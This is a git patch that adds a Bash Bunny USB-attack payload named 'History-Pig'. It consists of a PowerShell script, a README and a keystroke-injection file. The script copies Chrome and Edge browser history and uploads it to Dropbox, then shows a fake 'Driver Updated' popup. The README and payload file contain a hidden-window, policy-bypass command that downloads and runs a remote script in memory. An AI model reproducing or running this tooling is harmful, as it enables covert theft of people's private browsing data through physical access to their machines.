From d29b7048c875ec817cbbc3db2a7223efcdde78e1 Mon Sep 17 00:00:00 2001 From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Tue, 13 Sep 2022 21:42:45 -0400 Subject: [PATCH] Add files via upload --- BashBunny/payloads/History-Pig/HP.ps1 | 63 ++++++++++++ BashBunny/payloads/History-Pig/README.md | 109 +++++++++++++++++++++ BashBunny/payloads/History-Pig/payload.txt | 16 +++ 3 files changed, 188 insertions(+) create mode 100644 BashBunny/payloads/History-Pig/HP.ps1 create mode 100644 BashBunny/payloads/History-Pig/README.md create mode 100644 BashBunny/payloads/History-Pig/payload.txt diff --git a/BashBunny/payloads/History-Pig/HP.ps1 b/BashBunny/payloads/History-Pig/HP.ps1 new file mode 100644 index 0000000..42443b4 --- /dev/null +++ b/BashBunny/payloads/History-Pig/HP.ps1 @@ -0,0 +1,63 @@ +#History-Pig + +# See if file is a thing +Test-Path -Path "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" -PathType Leaf + +#If the file does not exist, write to host. +if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -PathType Leaf)) { + try { + Write-Host "The Chrome History file has not been found. " + } + catch { + throw $_.Exception.Message + } + } + # Copy Chrome History to Temp Directory to get sent to Dropbox + else { + $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history" + Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -Destination "$env:tmp/$F1" + } + +# See if file is a thing +Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf + +#If the file does not exist, write to host. +if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf)) { + try { + Write-Host "The Edge History file has not been found. " + } + catch { + throw $_.Exception.Message + } +} + # Copy Edge History to Temp Directory to get sent to Dropbox + else { + $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history" + Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -Destination "$env:tmp/$F2" +} + +function DropBox-Upload { + + [CmdletBinding()] + param ( + + [Parameter (Mandatory = $True, ValueFromPipeline = $True)] + [Alias("f")] + [string]$SourceFilePath + ) + $DropBoxAccessToken = "ADD-YOUR-DROPBOX-TOKEN-HERE" # Replace with your DropBox Access Token + $outputFile = Split-Path $SourceFilePath -leaf + $TargetFilePath="/$outputFile" + $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' + $authorization = "Bearer " + $DropBoxAccessToken + $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" + $headers.Add("Authorization", $authorization) + $headers.Add("Dropbox-API-Arg", $arg) + $headers.Add("Content-Type", 'application/octet-stream') + Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers + } + +DropBox-Upload -f "$env:tmp/$F1" +DropBox-Upload -f "$env:tmp/$F2" + +$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) diff --git a/BashBunny/payloads/History-Pig/README.md b/BashBunny/payloads/History-Pig/README.md new file mode 100644 index 0000000..b8552e8 --- /dev/null +++ b/BashBunny/payloads/History-Pig/README.md @@ -0,0 +1,109 @@ +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# History-Pig + +A payload to exfiltrate the history of the 2 most popular browsers + +## Description + +This payload will enumerate through the browser directories, looking for the file that stores the history + +These files will be saved to the temp directory + +Finally dropbox will be used to exfiltrate the files to cloud storage + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube + 		+ + Python + +
Twitter + 		+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/BashBunny/payloads/History-Pig/payload.txt b/BashBunny/payloads/History-Pig/payload.txt new file mode 100644 index 0000000..91224b2 --- /dev/null +++ b/BashBunny/payloads/History-Pig/payload.txt @@ -0,0 +1,16 @@ +REM Title: History-Pig + +REM Author: atomiczsec + +REM Description: This payload is meant to exfiltrate browsers history to a dropbox + +REM Target: Windows 10, 11 + +DELAY 2000 +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl +ENTER + +REM Remember to replace the link with your DropBox shared link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1